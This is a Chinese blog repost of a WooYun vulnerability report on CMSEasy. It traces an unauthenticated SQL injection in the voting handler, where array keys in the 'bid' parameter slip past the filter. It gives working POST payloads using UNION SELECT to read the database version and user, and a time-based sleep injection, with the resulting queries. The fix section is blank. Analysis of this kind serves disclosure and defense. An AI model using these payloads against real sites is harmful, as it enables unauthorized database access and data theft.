记录黑客技术中优秀的内容,传播黑客文化,分享黑客技术精华

cmseasy 修复不当前台无限制select union注射(绕过webscan)

2015-04-30 23:35

下载最新版本:

ballot_act.php:

code 区域
function index_action() {

if (front::post('submit')) {

if (!front::post('ballot')) {

front::alert(lang('Please_select_vote'));

return false;

}

if (config::get('checkip')) {

$time=cookie::get('vttime');

if (time() -$time <config::get('timer') * 60) {

front::alert(lang('You_have_voted'));

return false;

}

}

$bid=front::$post['bid'];

if (is_array(front::$post['ballot'])) {

$ids=implode(',',front::$post['ballot']);

}

else {

$ids=front::$post['ballot'];

}

if(preg_match('/(select|union|and|\'|"|\))/i',$ids)){

exit('非法参数');

}

if(preg_match('/(select|union|and|\'|"|\))/i',$bid)){

exit('非法参数');

}

$where="id in($ids)";

$data='num=num+1';

$option=new option();

$option->rec_update($data,$where);

$this->_table->rec_update($data,$bid);





这里初步对bid 和 ids 变量做了过滤



经过分析ids变量存在缺陷,但是比较鸡肋,无从下手,我们砖头看看bid



如果bid是一个数组会发生什么事情



rec_update:

code 区域
function rec_update($row,$where) {

$tbname=$this->name;

$sql=$this->sql_update($tbname,$row,$where);

//echo $sql."<br>";

return $this->query_unbuffered($sql);

}





在跟进到:

sql_update:

code 区域
function sql_update($tbname,$row,$where) {

//var_dump($row);

$sqlud='';

if (is_string($row))

$sqlud = $row.' ';

else

foreach ($row as $key=>$value) {

if (in_array($key,explode(',',$this->getcolslist()))) {

$value=$value;

/*if (preg_match('/^\[(.*)\]$/',$value,$match))

$sqlud .= "`$key`"."= '".$match[1]."',";

else*/if ($value === "")

$sqlud .= "`$key`= NULL, ";

else

$sqlud .= "`$key`"."= '".$value."',";

}

}

$sqlud=rtrim($sqlud);

$sqlud=rtrim($sqlud,',');

$this->condition($where);

$sql="UPDATE `".$tbname."` SET ".$sqlud." WHERE ".$where;

//echo $sql;

return $sql;

}







在跟进到condition函数:

code 区域
function condition(&$condition) {

if (isset($condition) &&is_array($condition)) {

$_condition=array();

foreach ($condition as $key=>$value) {

//$value=str_replace("'","\'",$value);

$key = htmlspecialchars($key,ENT_QUOTES);

$_condition[]="`$key`='$value'";

}

$condition=implode(' and ',$_condition);

}





htmlspecialchars这个函数是不对小引号做转移了 又出现自欺欺人一处





我们访问:

http://localhost/cmseasynew/uploads/index.php?case=ballot&act=index:



postdata:



submit=xx&ballot=1,2,3,4&bid[xxx%60%3d1%20UNION%20SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1%23]=xxxxxxxxxxxxxxxxxx



这里我们只是看看能否引进来:



抓取:

58.png





2015/1/27 12:54UPDATE `cmseasy_ballot` SET num=num+1 WHERE `xxx`=1 UNION SELECT/**/1,2,3,concat(version(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58 from cmseasy_archive ORDER BY 1#`='xxxxxxxxxxxxxxxxxx'



发现了没有可以无限制注射 ,简单验证一下 用时间注射

http://localhost/cmseasynew/uploads/index.php?case=ballot&act=index



postdata:



submit=xx&ballot=1,2,3,4&bid[num%60%3d1%20or%20sleep/**/(5)%23]=xxxxxxxxxxxxxxxxxx





抓取:

2015/1/27 13:04UPDATE `cmseasy_ballot` SET num=num+1 WHERE `num`=1 and sleep/**/(5)#`='xxxxxxxxxxxxxxxxxx'





成功执行



漏洞证明:

修复方案:


知识来源: www.wooyun.org/bugs/wooyun-2015-094160

阅读:125282 | 评论:0 | 标签:cms

想收藏或者和大家分享这篇好文章→复制链接地址

“cmseasy 修复不当前台无限制select union注射(绕过webscan)”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

❤人人都能成为掌握黑客技术的英雄❤

ADS

标签云